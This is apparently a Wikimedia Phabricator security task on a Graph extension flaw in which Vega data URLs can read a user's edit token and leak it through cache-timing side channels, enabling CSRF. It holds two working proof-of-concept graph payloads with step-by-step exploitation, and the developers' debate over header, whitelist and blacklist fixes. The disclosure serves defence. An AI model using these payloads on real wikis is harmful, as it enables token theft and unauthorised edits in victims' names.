Graphs can leak tokens, leading to CSRF
Closed, ResolvedPublic

Description

Summary: Graphs allow the user to load data sources from urls. This can be used to load edittokens of the current user (among other things. centralauthtoken might be another good target). You can then make further GET requests to transfer this obtained information to a third party. The domain whitelist is insufficient to stop the attack. Once you have an edit token, you can do the standard CSRF attack.

In detail:

Attacker creates a page with the following code on it [For length purposes this isn't the full graph you would use, but you get the idea.]:

<graph>
{
 "name": "image",
 "width": 200,
 "height": 200,
 "padding": {
   "left": 30,
   "top": 10,
   "bottom": 30,
   "right": 10
 },
 "data": [
   {
     "name": "data",
     "url": "https://commons.wikimedia.org/w/api.php?action=query&prop=info&titles=Main%20Page&intoken=edit&formatversion=2&format=json",
     "format": {
       "property": "query.pages",
       "type": "json"
     },
"transform": [
       {
         "type": "formula",
         "field": "data.img2",
         "expr": "'https://upload.wikimedia.org/wikipedia/commons/7/70/Example.png?token=' + d.data.edittoken"
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 76,
         "output": "data.t25",
         "ellipsis": "$",
         "wordbreak": false
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 77,
         "output": "data.t24",
         "ellipsis": "$",
         "wordbreak": false
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 72,
         "output": "data.t23",
         "ellipsis": "$",
         "wordbreak": false
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 73,
         "output": "data.t22",
         "ellipsis": "$",
         "wordbreak": false
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 74,
         "output": "data.t21",
         "ellipsis": "$",
         "wordbreak": false
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 75,
         "output": "data.t20",
         "ellipsis": "$",
         "wordbreak": false
       }
     ]
   }
 ],
 "scales": [
   {
     "name": "x",
     "domain": [
       0,
       3
     ],
     "range": "width"
   },
   {
     "name": "y",
     "domain": [
       0,
       3
     ],
     "range": "height"
   }
 ],
 "axes": [
   {
     "type": "x",
     "scale": "x"
   },
   {
     "type": "y",
     "scale": "y"
   }
 ],
 "marks": [
   {
     "type": "image",
     "from": {
       "data": "data"
},
     "properties": {
       "enter": {
         "url": {
           "field": "data.t25"
         }
       }
     }
   },
   {
     "type": "image",
     "from": {
       "data": "data"
     },
     "properties": {
       "enter": {
         "url": {
           "field": "data.t24"
         }
       }
     }
   },
   {
     "type": "image",
     "from": {
       "data": "data"
     },
     "properties": {
       "enter": {
         "url": {
           "field": "data.t23"
         }
       }
     }
   },
   {
     "type": "image",
     "from": {
       "data": "data"
     },
     "properties": {
       "enter": {
         "url": {
           "field": "data.t22"
         }
       }
     }
   },
   {
     "type": "image",
     "from": {
       "data": "data"
     },
     "properties": {
       "enter": {
         "url": {
           "field": "data.t21"
         }
       }
     }
   }
 ]
}
</graph>

Attacker creates an external web page, which loads the page containing this graph in an iframe. Attacker directs victim to visit this web page (Or maybe you just put the attack graph on a popular page, etc). Once the attack graph is loaded, victim's browser retrieves edit tokens, and also accesses urls like https://upload.wikimedia.org/wikipedia/commons/7/70/Example.png?token=7$, https://upload.wikimedia.org/wikipedia/commons/7/70/Example.png?token=78$, and so on, for all the digits of the edit token. These pages are now in varnish cache. Attacker then guesses the appropriate page, loads it, and looks at the x-cache header to see if its previously been accessed (This should only take the attacker about 40*16=640 tries).

Attacker now has the user's edit token. They can now use ajax on their web page to do a traditional csrf attack against the user, and edit stuff on their behalf.

As an aside, there is a similar (but much less serious) attack in stock mediawiki, where you can use {{REVISIONUSER}}, plus including images in specific obscure sizes, to leak which user was previewing the current page.

Thanks to @Legoktm for letting me bounce ideas about this off him.


Possible solutions:
*Make the url whitelist much more strict (perhaps only allow loading wikipages, so it could never get the edit tokens, although it'd be a shame to dissallow the api altogether as there is some interesting data there. Perhaps some parameter to api to mark the request unauthenticated, similar to the affect of json callback)
*Do all rendering server side (Not as fun for dynamic graphs. Might have some technical details on page previews preventing from working)

There are a very large number of changes, so older changes are hidden. Show Older Changes
Krinkle added a subscriber: Krinkle.May 8 2015, 5:15 AM
Yurik added a comment.May 8 2015, 10:28 AM

MW-Treat-As-Untrusted: 1 ? In theory, this could become a standard for any kinds of requests on the web, we might as well claim global scope :)

Anomie added a comment.May 8 2015, 1:53 PM

In theory, this could become a standard for any kinds of requests on the web, we might as well claim global scope :)

That's what RFC 6648 recommends to consider, too. We could bikeshed the specific name, but I don't think a prefix is needed here or would be that good of an idea.

Anomie added a comment.May 8 2015, 2:25 PM

Core patch for the new header:

Feel free adjust the patch if bikeshedding on the name comes up with something else.

greg added a subscriber: greg.May 8 2015, 5:07 PM

Core patch for the new header:

Feel free adjust the patch if bikeshedding on the name comes up with something else.

That looks like it should work. +1.

Patch deployed in production, seems to prevent authenticated requests from the api correctly. @Bawolff, I'm still looking into the edit page issue.

Yurik added a comment.May 8 2015, 7:29 PM

All patches have been deployed, the graphs code now sends Treat-as-Untrusted:1 header. MW API now checks for that header before doing anything sensitive. Blacklist capability is done, but needs to be enabled in configuration once we decide which URL regexes to block. Cross posting to T98313 and T98308.

Patch deployed in production, seems to prevent authenticated requests from the api correctly. @Bawolff, I'm still looking into the edit page issue.

Actually, I think it can be any normal page view.

For example:

<graph>
{
 "name": "image",
 "width": 200,
 "height": 200,
 "padding": {
   "left": 30,
   "top": 10,
   "bottom": 30,
   "right": 10
 },
 "data": [
   {
     "name": "data",
     "url": "/wiki/Special:BlankPage",
     "format": {
       "type": "tsv"
     },
"transform": [
       {
         "type": "formula",
         "field": "data.img2",
         "expr": "'https://upload.wikimedia.org/wikipedia/commons/7/70/Example.png?token=' + d.data['<!DOCTYPE html>']
"
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 125,
         "output": "data.t25",
         "ellipsis": "$",
         "wordbreak": false
       },
       {
         "type": "truncate",
         "value": "data.img2",
         "limit": 126,
         "output": "data.t24",
         "ellipsis": "$",
         "wordbreak": false
       }
     ]
   }
 ],
 "scales": [
   {
     "name": "x",
     "domain": [
       0,
       3
     ],
     "range": "width"
   },
   {
     "name": "y",
     "domain": [
       0,
       3
     ],
     "range": "height"
   }
 ],
 "axes": [
   {
     "type": "x",
     "scale": "x"
   },
   {
     "type": "y",
     "scale": "y"
   }
 ],
 "marks": [
   {
     "type": "image",
     "from": {
       "data": "data"
},
     "properties": {
       "enter": {
         "url": {
           "field": "data.t25"
         }
       }
     }
   },
   {
     "type": "image",
     "from": {
       "data": "data"
     },
     "properties": {
       "enter": {
         "url": {
           "field": "data.t24"
         }
       }
     }
   },
 ]
}
</graph>

Will load (among many other urls): https://upload.wikimedia.org/wikipedia/commons/7/70/Example.png?token=function%28%24%2CjQuery%29%7Bmw.user.tokens.set%28%7B%22editToken%22%3A%2230%24

Doing something like that requires loading significantly more urls then the other approach, but should still work.

Thanks Bawolff. That looks like it works.

I was hoping the whitelist would work, but https://www.mediawiki.org/w/index.php?action=raw&title=Special:BlankPage has the same issue. We could further limit to something like title=[^&:]?

The other option is, can we just force everything to go through graphoid? Then the calls come from the unauthenticated service, and these issues go away.

We could further limit to something like title=[^&:]?

So, the urls would be limited to paths that matched

^(?:/w/index.php?action=raw&title=[^&:]*|/w/api.php?.*)$

I.e., raw content of articles in the article namespace, and since we're setting the header, any calls to the api. That solves T98308 too.

Yurik added a comment.May 9 2015, 12:28 AM

I want to make everything (except during editing) go through graphoid anyway, this will just expedite the deployment :)
Reviewers needed: https://gerrit.wikimedia.org/r/#/c/209823/

We could further limit to something like title=[^&:]?

So, the urls would be limited to paths that matched

^(?:/w/index.php?action=raw&title=[^&:]*|/w/api.php?.*)$

I.e., raw content of articles in the article namespace, and since we're setting the header, any calls to the api. That solves T98308 too.

I think people will want to use data sources not in the main namespace (Most of the examples use other namespaces). So I guess that either leaves us trying to filter Special: (and all i18n-ized variants. Ugh.), or we could restrict it to /w/index.php?action=raw&curid=[0-9]*

Bawolff added a comment.EditedMay 11 2015, 4:15 PM

We could further limit to something like title=[^&:]?

So, the urls would be limited to paths that matched

^(?:/w/index.php?action=raw&title=[^&:]*|/w/api.php?.*)$

I.e., raw content of articles in the article namespace, and since we're setting the header, any calls to the api. That solves T98308 too.

I think people will want to use data sources not in the main namespace (Most of the examples use other namespaces). So I guess that either leaves us trying to filter Special: (and all i18n-ized variants. Ugh.), or we could restrict it to /w/index.php?action=raw&curid=[0-9]*

Actually, neither /w/index.php?action=raw&curid=[0-9]* nor :/w/index.php?action=raw&title=[^&:]* would work, since we have things like https://en.wikipedia.org/wiki/?curid=44&action=raw or https://en.wikipedia.org/w/index.php?title=~~~&action=raw . Getting a regex that covers all possible variations of an invalid title doesn't sound fun.

At this point, I think we should either:
*Extend the is-untrusted (or whatever we decided to call it) header to core mediawiki
*Have a specific endpoint just for fetching raw pages by graph (seems weird)
*Make <graph> use graphoid for all requests, including preview (Graphoid would probably have to be modified to do that)

Edit: Feeding it a bad title doesn't actually work, as vega sees the 400 error and refuses to load it.

At this point, I think we should either:
*Extend the is-untrusted (or whatever we decided to call it) header to core mediawiki

@Anomie, how likely do think this option is? Seems like it would be a bit of a hack in setting up the session (an probably so much easier post AuthManager), but there shouldn't be many extensions that update the session itself.

*Have a specific endpoint just for fetching raw pages by graph (seems weird)
*Make <graph> use graphoid for all requests, including preview (Graphoid would probably have to be modified to do that)

@Yurik, what is a realistic timeline for doing this?

Actually, neither /w/index.php?action=raw&curid=[0-9]* nor :/w/index.php?action=raw&title=[^&:]* would work

I don't see an actual counterexample to /w/index.php?action=raw&curid=[0-9]* working provided. Yes, it's very restrictive to only allow access using curid and that only with specific parameters in a particular order, but that doesn't mean the whitelist is failing.

And the whitelist would reject "/wiki/?" or "/w/index.php/title?" because it's not specifically "/w/index.php?".

At this point, I think we should either:
*Extend the is-untrusted (or whatever we decided to call it) header to core mediawiki

@Anomie, how likely do think this option is? Seems like it would be a bit of a hack in setting up the session (an probably so much easier post AuthManager), but there shouldn't be many extensions that update the session itself.

If we want it to force the request to be treated as not-logged-in like the API does: Post-AuthManager it might be doable in a straightforward manner. As things are now, though, it'd probably have to be a hack in User::loadFromSession() to exit early, bypassing the UserLoadFromSession hook and so on. And even then it might still allow for logging the user out (although that's the other bug) by getting MediaWiki to send a new session cookie.

If we just want to add checks in sensitive code paths like Special:Logout, that'd be easier. But less likely to be completely secure.

*Have a specific endpoint just for fetching raw pages by graph (seems weird)

If Graph allows for loading the data wrapped in JSON for transport, you could disallow action=raw entirely in favor of API action=query&prop=revisions&rvprop=content instead.

Yurik added a comment.May 11 2015, 7:12 PM

I just switched graphs to backend images, so this issue could now only affect editors of the graph pages that hit "preview button" for the section with the evil graph.

Bawolff added a comment.EditedMay 11 2015, 7:33 PM

> Actually, neither /w/index.php?action=raw&curid=[0-9]* nor
:/w/index.php?action=raw&title=[^&:]* would work

I don't see an actual counterexample to
/w/index.php?action=raw&curid=[0-9]* working provided. Yes, it's very
estrictive to only allow access using curid and that only with specific
parameters in a particular order, but that doesn't mean the whitelist is
failing.

If the curid given doesnt match an entry in the page table, you get special:badtitle in normal view which includes the edittoken

If Graph allows for loading the data wrapped in JSON for transport, you
could disallow action=raw entirely in favor of API
action=query&prop=revisions&rvprop=content instead.

I dont think that would work with graphs.

I just switched graphs to backend images, so this issue could now only
affect editors of the graph pages that hit "preview button" for the section
with the evil graph.

I havent checked, but i believe you can force a preview without any edit
token (if raw html disabled), so that's actually the more scary case since
there is no record of a saved page with evil code on it.

I just switched graphs to backend images, so this issue could now only

affect editors of the graph pages that hit "preview button" for the section
with the evil graph.

I havent checked, but i believe you can force a preview without any edit
token (if raw html disabled), so that's actually the more scary case since
there is no record of a saved page with evil code on it.

This is indeed the case, so yep, the exploit still works just fine.

I just switched graphs to backend images, so this issue could now only affect editors of the graph pages that hit "preview button" for the section with the evil graph.

@Yurik, is there a reason to not use graphoid for previews?

Also, T90526 would cause graphoid to have the same problem on private wikis. That's ok for zero, but not other private wikis.

@csteipp, graphoid cannot render anything that is not already stored in the wiki's page properties. Graphoid pulls that data on the fly to render the graph. Incomplete graphs (previews) are not stored. Also, graphoid is not able to render private wikis data because it has no way of either validating the user's session or passing user's session on to the api - and that's why I will need to implement T90526.

@csteipp, graphoid cannot render anything that is not already stored in the wiki's page properties. Graphoid pulls that data on the fly to render the graph. Incomplete graphs (previews) are not stored.

@Yurik, that makes sense for why you haven't done this. What's a realistic timeline that you could update graphoid to allow for it? The alternative is we need to blacklist "Special:" titles for all languages.

Yurik added a comment.May 12 2015, 8:32 PM

I am not exactly sure on the ETA for T98872 (arbitrary server-side rendering) - might take some time. For now I can easily block all (Special|...): if that's the agreed approach:

"(Aparteko|Aptaca|Arbednek|Arbennek|Arbennig|Arnawlı|Arnaýı|Astamiwa|Bağse|Berezi|Dibar|Doaimmat|Doxmeli|Er[_ ]lheh|Erenoamáš|Eri|Especial|Espesial|Espesiat|Espesiál|
Espesyal|Espezial|Extra|Husus|Ihü[_ ]kárírí|Immikkut|Ippiziari|Ispetziale|Istimewa|Istimiwa|Jagleel|Kerfissíða|khaas|Khas|Kusuih|Maalum|Maasus|Mahsus|Manokana|Maxsus|Mba'echĩchĩ|
Natatangi|Nōncuahquīzqui|Papa[_ ]nui|Patikos|Pinaurog|Posebno|Pàtàkì|Sapak|Sapaq|Schbezial|Schbädsjaal|Serstakt|Serstakur|Seviškuo|Shpezjal|Sipeciås|Sipesol|Soronko|Specala|
Speciaal|Special|Speciala|Specialaĵo|Speciale|Specialine|Specialis|Specialne|Specialnje|Specialus|Speciaol|Speciel|Specioal|Speciàle|Speciális|Speciální|Speciâl|Specjalna|
Specjalnô|Specēlos|Speisialta|Spesiaal|Spesial|Spesyal|Spezial|Speçiale|Speċjali|Spiciali|Spèciâl|Spécial|Syndrig|Szpecyjalna|Sònraichte|Tallituslehekülg|Taybet|
Tek-pia̍t|Toiminnot|Uslig|Uzalutno|Wiki|Xususi|Xüsusi|Xısusi|Özel|Ýörite|Đặc[_ ]biệt|Špeciálne|Ειδικό|Ειδικόν|Адмысловае|Аналлаах|Арнайы|Атайын|Башка|Башка[_ ]тевень|
Башхо|Белхан|Вижа|Къуллугъирал[_ ]лажин|Къуллукъ|Көдлхнə|Көдлхнә|Лӱмын[_ ]ыштыме|Махсус|Нарочьна|Отсасян|Панель|Посебно|Сæрмагонд|Служебная|Специални|Специјална|Специјални|
Спеціальна|Спеціальні|Спецӹлӹштӓш|Спэцыяльныя|Тусгай|Тускай|Тусхай|Цастәи|Шпеціална|Ярҙамсы|Ятарлă|Սպասարկող|באַזונדער|באזונדער|מיוחד|ئالاھىدە|اؤزل|ارنايى|تایبەت|حاص|خاص|شا|
ویجه|ویژه|ځانګړی|ۆێک|ܕܝܠܢܝܐ|ހާއްޞަ|ޚާއްސަ|खास|विशेष|विशेषम्|विसेस|বিশেষ|ਖ਼ਾਸ|ਖਾਸ|વિશેષ|ବିଶେଷ|சிறப்பு|ప్రత్యేక|ವಿಶೇಷ|പ്രത്യേ|പ്രത്യേകം|විශේෂ|พิเศษ|ພິເສດ|
სპეციალური|ልዩ|ពិសេស|特別|特殊|특|특수|특수기능):"

Generated using grep -h NS_SPECIAL mediawiki/languages/messages/*

@Yurik,

Ok, in that case let's go with the whitelist and blacklist. So all calls need to match the whitelist,

^(?:/w/index.php?action=raw&title=[^&]*|/w/api.php?.*)$

And also not match the blacklist of Special: translations you posted.

Can you put together a patch for that?

Yurik added a comment.May 12 2015, 8:41 PM

Black list is easy, whitelist will require some extra coding. The regex you propose is fairly limiting, and will break all the existing samples. Are you sure we have to have it? Can it be more lenient, or possibly have just the blacklist?

@Yurik, we need to prevent calls to action=edit, action=read, all special pages... and anything else that contains an edit token. That whitelist regex seems to be the best heuristic. Can you link to the samples, or list the urls they are using?

@Yurik,

Ok, in that case let's go with the whitelist and blacklist. So all calls need to match the whitelist,

^(?:/w/index.php?action=raw&title=[^&]*|/w/api.php?.*)$

And also not match the blacklist of Special: translations you posted.

Can you put together a patch for that?

That regex misses

Depending on what type of normalization you apply, also:

Yurik added a comment.EditedMay 13 2015, 8:46 AM

@Bawolff, did I tell you that you are a monster?

Anyway, seems we might have to rethink external links... E.g. change the meaning of url parameter to a fully custom:

{
  "url": "wiki://domain/page",          // remote link to the raw content
  "url": "wiki:///page",                // local link to the raw content
  "url": "wikiapi://domain?action=...", // remote api call
  "url": "wikiapi://?action=...",       // local api call
  "url": "wikiimg://domain/filepage",   // remote link to the image
  "url": "wikiimg:///filepage",         // local link to the image
}

And this also means that we should have some client & server side JavaScript code to properly resolve page titles. Something similar to the Title object that can be used as an NPM.

Hmm. We could combine that with what anomie said earlier - look for normal index.php?title=... url, when we see one we actually make an api request for that page title, and extract from api wrapping making it look right it came from original url. Should be safe and keeps back compat.

dpatrick renamed this task from Graphs can leaks tokens, leading to CSRF to Graphs can leak tokens, leading to CSRF.May 26 2015, 8:04 AM
MaxSem added a comment.Jun 7 2015, 1:24 PM

Honestly, the proposed solution, in addition to being overly complex, doesn't provide the full protection: consider, for example, wikiimg:$token. While the resulting request will be a 404, it will still be cached for 5 minutes, permitting the side channel to exist.

@MaxSem,

As I understand it from Yurik, the new scheme will be the only way to access data urls, so there won't be a way to get $token to use in a followup. But if there is a way, then correct, it would still be easy to get the token to the attacker via the cache.

@Yurik, can you give a status update on this?

Yurik added a subscriber: brion.Jul 15 2015, 3:33 PM
brion added a comment.Jul 15 2015, 3:41 PM

We chatted a bit about the URL scheme tweaking plans at Wikimania hackathon -- new scheme is still more or less agreed on but not yet implemented, and it may imply more work to make editing easier etc. Are there any quick-fixes that can be done in the meantime?

We can filter which urls are accessible to the list of ones that will be included in the new schemes. That regexes will need to be fairly strict, which will probably annoy some users until the schemes are implemented. But that will fix the immediate issue.

Yurik added a comment.Oct 21 2015, 2:23 AM

I did some digging in how external URLs are used in all public wikis. There are not that many external data usages yet (<100), possibly because we don't have a good story for external data access (e.g. storing data in commons). I see the following patterns:

External data stored as pages

/w/index.php?title=<TITLE>&action=raw
/wiki/<TITLE>?action=raw
(https?:)? //<DOMAIN>/w/index.php?title=<TITLE>&action=raw

All these could in theory be tested with a regex that accepts all of the above, without introducing anything complex. Plus we could add and encourage the usage of a custom URL: wiki:///page and wiki://domain/page

Data from API

Experimental, but shows the potential - article edit history, categories pie chart

/w/api.php?action=query&format=json&prop=revisions&titles=<TITLE>&rvlimit=max&rvprop=timestamp|user|size&rawcontinue
https://<DOMAIN>/w/api.php?generator=categorymembers&gcmtitle=Category:<CATEGORY>&gcmtype=subcat&action=query&gcmlimit=max&prop=categoryinfo&formatversion=2&format=json

This is a free for all, but IIRC, api is safe due to the header that graph passes. Should be easy to test these with regex - anything starting with /w/api.php is ok.

Images (used from "img" and from "range")

//upload.wikimedia.org/wikipedia/commons/<IMAGE>.png
//upload.wikimedia.org/wikipedia/commons/thumb/<IMAGE>.png
//upload.wikimedia.org/wikipedia/commons/thumb/<IMAGE>.svg.png

Few at this point, also few usages, and they are a bit ugly as they hardcode thumb links.

Yurik added a comment.EditedOct 22 2015, 1:54 AM

Seems that these whitelist Regexes should suffice, but with RE there are always problems, so please take a look. The URL will always be expanded to the full form before running through the regex (e.g. protocol and host will be present). I do not test protocol or host because they are checked before this test.

array(
  '^[^/?]*//[^/?]*/w/index\\.php\\?title=[^&]+&action=raw$', // https://<DOMAIN>/w/index.php?title=<TITLE>&action=raw
  '^[^/?]*//[^/?]*/wiki/[^&/?]+&action=raw$',  // https://<DOMAIN>/wiki/<TITLE>?action=raw
  '^[^/?]*//[^/?]*/w/api\\.php\\?.*$', // https://<DOMAIN>/w/api.php?...
  '^[^/?]*//[^/?]*/[^&?]+$',           // https://upload.wikimedia.org/wikipedia/commons/thumb/<IMAGE>.png
);

@Yurik, is this in addition to a blacklist for Special pages? If not, then '^[^/?]*//[^/?]*/[^&?]+$' will match /wiki/Special:Blank, and we're in the same place, iirc.

Yurik added a comment.Oct 22 2015, 9:07 PM

Both can be used at the same time, so yes, if special pages need to be blocked, we can do that.

I just re-read some of the comments:

  • Graphoid-only solution would work after some changes (I am working on them with the services team), but its a very bad solution in the long run - dynamic Vega has launched, and in order for it to work, it will have to be client side
  • Ideally, RESTBase's API would work best here to get the raw content of the page, but they haven't implemented it yet (planned)
  • We don't need to filter out image requests with the same strictness as data urls - if its not an image, Vega simply won't draw it
  • It would be good to add a temporary "don't trust me" header handling as proposed by @Anomie, until RESTBase is capable of handling it
  • For now I will implement a regex to block all special pages in all languages

^[^/?]*[^/?]*/wiki/[^&/?]+&action=raw$', https://<DOMAIN>/wiki/<TITLE>?action=raw

That doesn't look quite right. Did you mean:

^[^/?]*[^/?]*/wiki/[^&/?]+\?action=raw$', https://<DOMAIN>/wiki/<TITLE>?action=raw

Either way, I don't think this url pattern should be allowed. Consider something like https://test.wikipedia.org/wiki/foo%3Faction=view%26foo=?action=raw (from T96274). People should just be happy with the index.php version.

Yurik added a comment.EditedOct 25 2015, 2:53 AM

I ran this search to get all possible specials: grep NS_SPECIAL mediawiki/languages/messages/* (below). The new settings would be this:

$whitelist = array(
  // https://<DOMAIN>/w/index.php?title=<TITLE>&action=raw
  '^[^/?]*//[^/?]*/w/index\\.php\\?title=[^&]+&action=raw$',
  // https://<DOMAIN>/w/api.php?...
  '^[^/?]*//[^/?]*/w/api\\.php\\?.*$',
  // https://upload.wikimedia.org/wikipedia/commons/thumb/<IMAGE>.png
  '^[^/?]*//[^/?]*/[^&?]+$',
);
$blacklist = array(
  // disable any title from special namespace
  '^[^/?]*//[^/?]*/w/index\\.php\\?title=(_|\s)*(............)(_|\s)*:[^&]+&action=raw$',
);

The dots are replaced with this list:

(Aparteko|Aptaca|Arbednek|Arbennek|Arbennig|Arnawlı|Arnaýı|Astamiwa|Bağse|Berezi|Dibar|Doaimmat|Doxmeli|Er_lheh|Erenoamáš|Eri|Especial|Espesial|Espesiat|Espesiál|Espesyal|Espezial|Extra|Husus|Ihü_kárírí|Immikkut|Ippiziari|Ispetziale|Istimewa|Istimiwa|Jagleel|Kerfissíða|khaas|Khas|Kusuih|Maalum|Maasus|Mahsus|Manokana|Maxsus|Mba'echĩchĩ|Natatangi|Nōncuahquīzqui|Papa_nui|Patikos|Pinaurog|Posebno|Pàtàkì|Sapak|Sapaq|Schbezial|Schbädsjaal|Serstakt|Serstakur|Seviškuo|Shpezjal|Sipeciås|Sipesol|Soronko|Specala|Speciaal|Special|Speciala|Specialaĵo|Speciale|Specialine|Specialis|Specialne|Specialnje|Specialus|Speciaol|Speciel|Specioal|Speciàle|Speciális|Speciální|Speciâl|Specjalna|Specjalnô|Specēlos|Speisialta|Spesiaal|Spesial|Spesyal|Spezial|Speçiale|Speċjali|Spiciali|Spèciâl|Spécial|Syndrig|Szpecyjalna|Sònraichte|Tallituslehekülg|Taybet|Tek-pia̍t|Toiminnot|Uslig|Uzalutno|Wiki|Xususi|Xüsusi|Xısusi|Özel|Ýörite|Đặc_biệt|Špeciálne|Ειδικό|Ειδικόν|Адмысловае|Аналлаах|Арнайы|Атайын|Башка|Башка_тевень|Башхо|Белхан|Вижа|Къуллугъирал_лажин|Къуллукъ|Көдлхнə|Көдлхнә|Лӱмын_ыштыме|Махсус|Нарочьна|Отсасян|Панель|Посебно|Сæрмагонд|Служебная|Специални|Специјална|Специјални|Спеціальна|Спеціальні|Спецӹлӹштӓш|Спэцыяльныя|Тусгай|Тускай|Тусхай|Цастәи|Шпеціална|Ярҙамсы|Ятарлă|Սպասարկող|באַזונדער|באזונדער|מיוחד|ئالاھىدە|اؤزل|ارنايى|تایبەت|حاص|خاص|شا|ویژه|ځانګړی|ڤیجە|ۆێک|ܕܝܠܢܝܐ|ހާއްޞަ|ޚާއްސަ|खास|विशेश|विशेष|विशेषः|विशेषम्|विसेस|বিশেষ|ਖ਼ਾਸ|ਖਾਸ|વિશેષ|ବିଶେଷ|சிறப்பு|ప్రత్యేక|ವಿಶೇಷ|പ്രത്യേ|പ്രത്യേകം|විශේෂ|พิเศษ|ພິເສດ|სპეციალური|ልዩ|ពិសេស|特別|特殊|특|특수|특수기능)

You can never solve this with a blacklist because there's an almost infinite number of ways to represent a URL. For example, _ can be replaced with %20. There has to be a different way.

Core patch for the new header:

Feel free adjust the patch if bikeshedding on the name comes up with something else.

Looking back at it, I realized it doesn't Vary on the new header. Fixed and rebased in

.

I am not fond of the blacklist approach. In addition to _ vs %20 MaxSem just mentioned, the above also isn't dealing with case sensitivity.

I suggest that instead all index.php type requests get silently rewritten as api requests. Tad hacky, but in combination with Anomie's patch for the api, feels a lot more safe (imo)

See:

Yurik added a comment.EditedDec 7 2015, 3:14 AM

After a long and hard process of migrating to Vega2, this is my first draft implementation (still pending an upstream merge, and graphoid update): https://gerrit.wikimedia.org/r/#/c/257265/

Call to api.php - ignores the path parameter, only uses the query part of the url, forces format=json & formatversion=2

wikiapi:///?action=query&list=allpages

Call to RESTbase api - requires the path to start with "/api/":

wikirest:///api/rest_v1/page/...

Get raw content of a wiki page, where the path is the title of the page with an additional leading '/' which gets removed. Uses mediawiki api, and extract the content after the request:

wikiraw:///MyPage/data

Get an image for the graph, e.g. from commons. This tag specifies any content from the uploads.* domain, without query params:

wikiupload://upload.wikimedia.org/wikipedia/commons/3/3e/Einstein_1921_by_F_Schmutzer_-_restoration.jpg

https://gerrit.wikimedia.org/r/#/c/257265/ looks to be generally in the right direction. What would the timeline be for deprecating https? protocols?

Yurik added a comment.Dec 9 2015, 9:04 PM

@csteipp, once that patch merges, there are not that many graphs to update by hand. And we really can do it via SWAT, without waiting for the train. The bigger question is how we want to deal with the commons - @Bawolff's comment. From my understanding, the client does not know how to convert image name to an uploads URL, especially via thumb. We could call the api and use its response to get an image, but that would make already slow client-side vega even slower. Thoughts?

From my understanding, the client does not know how to convert image name to an uploads URL, especially via thumb.

I think you can reimplement FileRepo::getHashPathForLevel, and come up with the path yourself. It's just the first characters of the md5 of the name, after you normalize it. Or is there some other aspect that you're not able to generate?

Yurik added a comment.Dec 9 2015, 9:57 PM

@csteipp, i think FileRepo also looks at what thumbs have already been generated, and uses the existing file if its close enough to the requested size, but I haven't looked at it in a while. I could re-implement the file url generation on the frontend, but obviously this is a code duplication. Is this the desired path?

@Yurik, I think generating the url is a better direction than just requiring the url to start with "upload.". A call to the api to lookup the name seems like the right way to do it, but you really think the performance overhead is too much, I wanted to suggest another option.

MultimediaViewer ran into similar issues with generating file names on the frontend. Be careful, its more complicated then it looks...

Personally i think it would be best to discuss the best form for url syntax after the security part is dealt with, but the reason im bringing it up now is im worried that whatever we decide on we will be stuck with.

Yurik added a comment.Dec 9 2015, 11:09 PM

In that case I propose that we use the "raw" form for uploads for now, and also start thinking about the wikiimg:// in a public discussion. Once decided, it should be fairly simple to migrate, possibly even automatically.

wikirawupload://upload.wikimedia.org/wikipedia/commons/thumb/e/e2/Albert_Einstein_and_Charlie_Chaplin_-_1931.jpg/795px-Albert_Einstein_and_Charlie_Chaplin_-_1931.jpg

Yurik added a comment.EditedDec 11 2015, 8:55 PM

Related issue - apparently there is a security patch that handles "Treat-As-Untrusted" header somewhere for CORS, and it breaks legit usage. If you go here, and click "Preview", you will see this error in the debug console:

XMLHttpRequest cannot load https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia/all-access/user/Barack_Obama/daily/2015110100/2015123100. Request header field Treat-as-Untrusted is not allowed by Access-Control-Allow-Headers in preflight response.

Graphoid does not have this problem because it does not have a user session and does not send Treat-As-Untrusted header: result.
P.S. request info

Yurik added a subscriber: GWicke.Dec 11 2015, 9:13 PM

That seems like a success. Apis (at least in a cross domain context) that dont understand the header are rejecting the request (or the browser is anyway).

t

GWicke added a comment.EditedDec 11 2015, 9:26 PM

I wonder why we are sending credentials with the XHR in the first place. According to https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS, the default value for the withCredentials XHR property is false, so I assume we explicitly ask for credentials to be sent somewhere in our client-side code? Could we just not do that for requests that shouldn't be authenticated?

Yurik added a comment.Dec 11 2015, 9:52 PM

@bawolf, what steps do we need to take to allow the /api/rest_v1 process this request? I will also need to do it for the maps server.

I wonder why we are sending credentials with the XHR in the first place. According to https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS, the default value for the withCredentials XHR property is false, so I assume we explicitly ask for credentials to be sent somewhere in our client-side code?

withCredentials only applies to CORS requests, not requests to the same origin, which is why Treat-as-Untrusted was created. It probably shouldn't be included on cross-origin requests, since we're not including it in Access-Control-Allow-Headers.

Yurik added a comment.EditedDec 11 2015, 11:11 PM

Thanks @Anomie! Are we then ok with sending Treat-as-Untrusted header only to those URLs, whose host, port, and protocol match the current one?

GWicke added a comment.EditedDec 12 2015, 1:27 AM

@Anomie, makes sense.

@Yurik: Is there actually a use case for supporting the kind of data massaging + templated requests described in the task description on the client? To me it would seem that separating the data massaging from the presentation (and disabling client-side transforms) would avoid much of this in the first place. It would likely also improve performance by letting us cache the fully transformed data, rather than re-transforming data on each view.

Yurik added a comment.Dec 12 2015, 2:36 AM

@GWicke, the use cases for using API or other URLs is very extensive. Just today I added a small graph that uses the new analytics pageview api - note that it constructs an api URL from the template parameters. Most other examples on that page also use URLs to get data and images. Most of the time, there is no client-side transformation taking place - all this happens in Graphoid. The only two exceptions are during editing (preview) and interactive graphs -- they do load all the needed data to the client. If we had server-side data manipulating facilities, we could load less data (this is exactly what i do for Zero portal). But transformations are a core part of the Vega spec, used both during initial data aggregation and during visual mark drawing. Unless we want to move away from something that has a potential of becoming a W3C standard, I think we should support it in full. I hope I understood your point.

Thanks @Anomie! Are we then ok with sending Treat-as-Untrusted header only to those URLs, whose host, port, and protocol match the current one?

No, we are not.

Yurik added a comment.Dec 12 2015, 4:38 AM

@Bawolff, please elaborate. At this point the restbase api and kartotherian services are inaccessible - are we doing this white-list based then? In which case - what are the steps required to enable these services?

